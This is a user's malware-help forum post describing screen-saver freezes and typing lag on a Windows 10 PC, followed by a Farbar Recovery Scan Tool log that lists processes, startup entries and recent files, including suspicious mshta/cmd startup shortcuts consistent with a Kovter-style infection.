For a couple of months, I have noticed that my screen saver, which is a message that is supposed to bounce, will freeze up. My screen saver setting is set to kick in at 1 minute, by the way. Several times throughout the day, I will notice my screen saver is NOT bouncing but frozen. After several seconds, it will move but freeze again.
I move the mouse to remove the screen saver but nothing happens. I continually shake the mouse for at least 30 seconds and nothing. I have had to resort to hitting Control/Alt/Delete; the screen saver will disappear, I hit Cancel, and all things seem normal as far as the screen saver goes.
I have also noticed a lag when typing. I can type rather quickly, but the words do not appear as quickly as they should; perhaps a half second or less in lag time.
G2G advised me to run the program Kovter removal tool. I did as advised. It ran just fine and disappeared when it finished. It flashed something on the screen but it was off in an instant so I have no idea what it said.
G2G also asked me to check my CPU usage and I have two register server processes running and taking up a lot of CPU.
64 Bit OS
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-01-2017
Ran by Dorraine (administrator) on DORRAINE-PC (11-01-2017 01:56:56)
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine & DefaultAppPool (Available Profiles: Dorraine & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Piriform Ltd) C:\Program Files\Defraggler\Defraggler64.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_24_0_0_186.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_24_0_0_186.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25779624 2016-12-21] (Dropbox, Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2001920 2014-04-04] (AimerSoft)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-06] (SUPERAntiSpyware)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [Spotify Web Helper] => C:\Users\Dorraine\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1525360 2016-05-15] (Spotify Ltd)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\RunOnce: [Uninstall C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [231936 2016-07-16] (Microsoft Corporation)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-06-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-10]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-11]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{b9a91879-cca5-4abf-b5c9-de12170b6992}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
FireFox:
========
FF ProfilePath: C:\Users\Dorraine\AppData\Roaming\Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 [2017-01-11]
FF Homepage: Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 -> hxxp://my.xfinity.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2016-12-13] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default [2016-09-27]
CHR Extension: (Google Slides) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-29]
CHR Extension: (Google Docs) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-29]
CHR Extension: (Google Drive) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (YouTube) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-09-29]
CHR Extension: (Google Sheets) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-09-27]
CHR Extension: (Gmail) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-29]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7032080 2016-05-12] (TeamViewer GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 avgntflt; C:\Windows\SysWOW64\DRIVERS\avgntflt.sys [144664 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\SysWOW64\DRIVERS\avipbb.sys [154392 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\SysWOW64\DRIVERS\avkmgr.sys [35488 2016-08-18] (Avira Operations GmbH & Co. KG)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows ® Win 7 DDK provider)
S3 k57nd; C:\WINDOWS\System32\DRIVERS\k57amd64.sys [356392 2011-10-25] (Broadcom Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 WsAudioDevice_383S(1); C:\WINDOWS\System32\drivers\WsAudioDevice_383S(1).sys [29288 2015-07-30] (Wondershare)
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-01-11 01:56 - 2017-01-11 01:58 - 00015534 _____ C:\Users\Dorraine\Downloads\FRST.txt
2017-01-11 01:55 - 2017-01-11 01:56 - 00001015 _____ C:\Users\Dorraine\Desktop\FRST64 - Shortcut.lnk
2017-01-11 01:52 - 2017-01-11 01:56 - 00000000 ____D C:\FRST
2017-01-11 01:51 - 2017-01-11 01:52 - 02419200 _____ (Farbar) C:\Users\Dorraine\Downloads\FRST64.exe
2017-01-10 23:49 - 2017-01-10 23:49 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64(2).exe
2017-01-10 23:46 - 2017-01-10 23:50 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64(1).exe
2017-01-10 23:45 - 2017-01-10 23:46 - 02744744 _____ (Symantec Corporation) C:\Users\Dorraine\Downloads\FixTool64.exe
2016-12-31 19:46 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Documents\MVI_3884_x264.mp4
2016-12-31 19:38 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Downloads\MVI_3884_x264.mp4
2016-12-31 19:33 - 2016-12-24 23:26 - 1440503384 _____ C:\Users\Dorraine\Documents\MVI_3884.MOV
2016-12-31 19:30 - 2016-12-31 18:33 - 12477637 _____ C:\Users\Dorraine\Documents\MVI_3886_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:26 - 18908883 _____ C:\Users\Dorraine\Documents\MVI_3883_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:19 - 14543355 _____ C:\Users\Dorraine\Documents\MVI_3885_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:57 - 23483944 _____ C:\Users\Dorraine\Documents\MVI_3888_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:47 - 15521466 _____ C:\Users\Dorraine\Documents\MVI_3887_x264.mp4
2016-12-31 17:35 - 2016-12-31 17:36 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming\Anvsoft
2016-12-31 17:35 - 2016-12-31 17:35 - 00001272 _____ C:\Users\Dorraine\Desktop\Any Video Converter.lnk
2016-12-31 17:35 - 2016-12-31 17:35 - 00000000 ____D C:\Users\Dorraine\Documents\Any Video Converter
2016-12-31 17:33 - 2016-12-31 17:33 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2016-12-31 17:29 - 2016-12-31 17:30 - 51282968 _____ C:\Users\Dorraine\Downloads\avc-free.exe
2016-12-21 22:22 - 2016-12-21 22:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-12-21 13:15 - 2016-12-21 13:15 - 00042096 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865
2016-12-13 23:21 - 2016-12-09 05:01 - 01503544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2016-12-13 23:21 - 2016-12-09 05:01 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-12-13 23:21 - 2016-12-09 04:57 - 06668040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-12-13 23:21 - 2016-12-09 04:52 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-12-13 23:21 - 2016-12-09 04:40 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-12-13 23:21 - 2016-12-09 04:34 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-12-13 23:21 - 2016-12-09 04:32 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-12-13 23:21 - 2016-12-09 04:30 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-12-13 23:21 - 2016-12-09 04:20 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-12-13 23:21 - 2016-12-09 04:18 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-12-13 23:21 - 2016-12-09 04:18 - 00165376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2016-12-13 23:21 - 2016-12-09 04:17 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-12-13 23:21 - 2016-12-09 04:16 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-12-13 23:21 - 2016-12-09 04:16 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-12-13 23:21 - 2016-11-02 05:28 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2016-12-13 23:20 - 2016-12-09 05:11 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-12-13 23:20 - 2016-12-09 05:01 - 02323728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2016-12-13 23:20 - 2016-12-09 04:59 - 02166752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-12-13 23:20 - 2016-12-09 04:59 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-12-13 23:20 - 2016-12-09 04:57 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-12-13 23:20 - 2016-12-09 04:56 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-12-13 23:20 - 2016-12-09 04:52 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-12-13 23:20 - 2016-12-09 04:51 - 00117240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
2016-12-13 23:20 - 2016-12-09 04:41 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WordBreakers.dll
2016-12-13 23:20 - 2016-12-09 04:34 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-12-13 23:20 - 2016-12-09 04:31 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-12-13 23:20 - 2016-12-09 04:31 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-12-13 23:20 - 2016-12-09 04:30 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-12-13 23:20 - 2016-12-09 04:28 - 03306496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-12-13 23:20 - 2016-12-09 04:27 - 19417088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-12-13 23:20 - 2016-12-09 04:23 - 12177920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-12-13 23:20 - 2016-12-09 04:20 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-12-13 23:20 - 2016-12-09 04:18 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-12-13 23:20 - 2016-12-09 04:16 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-12-13 23:20 - 2016-12-09 04:15 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditBufferTestHook.dll
2016-12-13 23:19 - 2016-12-09 05:00 - 00106896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcrypt.dll
2016-12-13 23:19 - 2016-12-09 04:36 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-12-13 23:19 - 2016-12-09 04:31 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-12-13 23:19 - 2016-12-09 04:17 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-12-13 23:19 - 2016-12-09 03:54 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-12-13 22:59 - 2016-12-09 05:20 - 01738560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-12-13 22:59 - 2016-12-09 05:19 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-12-13 22:59 - 2016-12-09 05:15 - 08168000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-12-13 22:59 - 2016-12-09 05:10 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-12-13 22:59 - 2016-12-09 04:45 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-12-13 22:59 - 2016-12-09 04:37 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-12-13 22:59 - 2016-12-09 04:22 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-12-13 22:59 - 2016-12-09 04:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-12-13 22:59 - 2016-12-09 04:21 - 01512960 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-12-13 22:59 - 2016-12-09 04:20 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-12-13 22:59 - 2016-12-09 04:19 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-12-13 22:59 - 2016-09-15 11:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-12-13 22:58 - 2016-12-09 05:32 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-12-13 22:58 - 2016-12-09 05:27 - 00172528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
